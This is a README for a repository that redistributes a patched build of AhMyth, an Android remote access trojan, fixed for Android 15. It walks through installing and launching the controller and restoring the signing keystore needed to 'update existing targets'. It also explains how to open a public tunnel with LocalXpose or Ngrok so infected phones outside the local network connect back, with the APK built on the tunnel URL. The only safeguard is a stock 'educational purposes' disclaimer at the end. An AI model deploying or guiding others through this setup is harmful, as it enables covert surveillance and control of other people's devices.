AhMyth Android RAT - Recovery Build (Android 15 Fixed)
This repository contains a recovered and patched version of the AhMyth Android Remote Administration Tool. Since the original repository was taken down, this backup serves as a "Gold Master" for future deployments, including fixes for Android 15 compatibility. 🚀 Installation & Setup
- Prerequisites
Before cloning, ensure your system has the necessary dependencies for handling large files and running the Electron environment: Bash
sudo apt update sudo apt install git git-lfs nodejs npm -y
- Clone the Repository
Because this repo uses Git LFS for the heavy binaries (app.asar and ahmyth), you must initialize LFS before cloning: Bash
git lfs install git clone https://github.com/TestinginKali/AhMyth-backup.git cd AhMyth-backup
- Running the Application
There are two ways to launch the tool depending on your environment: Option A: Using the Compiled Binary (Fastest) Bash
chmod +x ahmyth ./ahmyth
Option B: Running from Source (Recommended for Stability)
If the binary fails due to library mismatches, run the unpacked source: Bash
cd resources/unpacked_code npm install npm start
🛠 Critical Configuration Restoring the Keystore
Warning: Without your original keystore, you cannot update existing targets.
Open AhMyth.
Go to the Settings/Lab tab.
Select your backed-up keystore: Output/ahmyth.keystore.
Use the password defined during the initial creation (e.g., password123).
Setting up the Tunnel
To receive connections from outside your local network, use a tunnel (like LocalXpose or Ngrok): Bash
loclx tunnel http --to 127.0.0.1:42475
Note: Ensure the APK is built using the Public URL provided by your tunnel. 📁 Repository Structure
/ahmyth - The main Linux executable.
/resources/app.asar - The compressed Electron application logic.
/resources/unpacked_code - The raw JavaScript/Node.js source code.
/Output - Contains signing keys and final aligned APKs.
This tool is for educational and authorized security testing purposes only. The author is not responsible for any misuse or damage caused by this software.